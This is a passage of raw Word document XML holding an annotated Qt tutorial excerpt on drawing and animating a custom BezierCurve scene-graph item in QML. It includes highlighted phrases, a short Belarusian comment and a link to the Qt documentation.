      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, we specify that the view should be </w:t>
      </w:r>
      <w:r w:rsidRPr="00935106">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>multisampled to get antialiasing</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. This is not required, but it will make the item </w:t>
      </w:r>
      <w:r w:rsidRPr="00935106">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>look a bit nicer on hardware that supports it</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00935106">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Multisampling is not enabled by default because it often results in higher memory usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00935106">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00935106" w:rsidRPr="00935106">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Example of multisampling antialising.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE08BB" w:rsidRPr="00AE08BB" w:rsidRDefault="00AE08BB" w:rsidP="00081348">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1809" w:name="using-the-item"/>
      <w:bookmarkStart w:id="1810" w:name="_Toc483000922"/>
      <w:bookmarkStart w:id="1811" w:name="_Toc483003913"/>
      <w:bookmarkStart w:id="1812" w:name="_Toc483604265"/>
      <w:bookmarkStart w:id="1813" w:name="_Toc483605485"/>
      <w:bookmarkEnd w:id="1809"/>
      <w:r w:rsidRPr="00081348">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Using the Item</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1810"/>
      <w:bookmarkEnd w:id="1811"/>
      <w:bookmarkEnd w:id="1812"/>
      <w:bookmarkEnd w:id="1813"/>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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import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QtQuick</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2.0</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import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CustomGeometry</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1.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE08BB" w:rsidRPr="00AE08BB" w:rsidRDefault="00AE08BB" w:rsidP="00AE08BB">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Our .qml file imports the</w:t>
      </w:r>
      <w:r w:rsidR="00935106">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QtQuick 2.0</w:t>
      </w:r>
      <w:r w:rsidR="00935106">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>module to get the standard types and also our own</w:t>
      </w:r>
      <w:r w:rsidR="00935106">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CustomGeometry 1.0</w:t>
      </w:r>
      <w:r w:rsidR="00935106">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>module which contains our newly created BezierCurve objects.</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Item</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width</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300</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height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200</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BezierCurve</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id</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line</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anchors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fill</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parent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ln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        anchors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margins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20</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE08BB" w:rsidRPr="00AE08BB" w:rsidRDefault="00AE08BB" w:rsidP="00AE08BB">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Then we create the our root item and an instance of the BezierCurve which we anchor to fill the root.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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> real 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SequentialAnimation</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> on t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NumberAnimation</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to</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1</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duration</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2000</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easing</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type</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Easing</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InOutQuad</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NumberAnimation</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to</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0</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duration</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2000</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easing</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type</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Easing</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InOutQuad</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loops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Animation</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Infinite</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p2</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point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1</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p3</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Qt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point</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</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t</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Fonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">To make the example a bit more interesting we </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>add an animation</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to change the two control points in the curve. The end points stay unchanged.</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Text</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</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anchors</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bottom</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line</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bottom</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x</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20</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width</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parent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width </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lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>40</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wrapMode</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Text</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WordWrap</w:t>
      </w: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AE08BB" w:rsidRPr="00AE08B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AE08BB">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        text</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"This curve is a custom scene graph item, implemented using GL_LINE_STRIP"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE08BB" w:rsidRPr="00B31A2B" w:rsidRDefault="00AE08BB" w:rsidP="00AE08BB">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00B31A2B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE08BB" w:rsidRPr="00B31A2B" w:rsidRDefault="00AE08BB" w:rsidP="00AE08BB">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B31A2B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D94480" w:rsidRPr="00CD4012" w:rsidRDefault="00CD4012" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Гэты прыклад атрымаўся добра.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4012">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Ён зразумелы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD4012" w:rsidRPr="00CD4012" w:rsidRDefault="00CD4012" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD4012" w:rsidRDefault="00490E7E" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2142" w:history="1">
        <w:r w:rsidR="00CD4012" w:rsidRPr="00F24B8D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http</w:t>
        </w:r>
        <w:r w:rsidR="00CD4012" w:rsidRPr="00D94480">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>://</w:t>
        </w:r>
        <w:r w:rsidR="00CD4012" w:rsidRPr="00F24B8D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>doc</w:t>
        </w:r>
        <w:r w:rsidR="00CD4012" w:rsidRPr="00D94480">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="00CD4012" w:rsidRPr="00F24B8D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qt</w:t>
        </w:r>
        <w:r w:rsidR="00CD4012" w:rsidRPr="00D94480">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="00CD4012" w:rsidRPr="00F24B8D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>io</w:t>
        </w:r>
        <w:r w:rsidR="00CD4012" w:rsidRPr="00D94480">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidR="00CD4012" w:rsidRPr="00F24B8D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qt</w:t>
        </w:r>
        <w:r w:rsidR="00CD4012" w:rsidRPr="00D94480">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>-5/</w:t>
        </w:r>
        <w:r w:rsidR="00CD4012" w:rsidRPr="00F24B8D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qtquick</w:t>
        </w:r>
        <w:r w:rsidR="00CD4012" w:rsidRPr="00D94480">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="00CD4012" w:rsidRPr="00F24B8D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>scenegraph</w:t>
        </w:r>
        <w:r w:rsidR="00CD4012" w:rsidRPr="00D94480">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="00CD4012" w:rsidRPr="00F24B8D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>simplematerial</w:t>
        </w:r>
        <w:r w:rsidR="00CD4012" w:rsidRPr="00D94480">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="00CD4012" w:rsidRPr="00F24B8D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>example</w:t>
        </w:r>
        <w:r w:rsidR="00CD4012" w:rsidRPr="00D94480">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="00CD4012" w:rsidRPr="00F24B8D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00CD4012" w:rsidRPr="00CD4012" w:rsidRDefault="00CD4012" w:rsidP="00081348">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
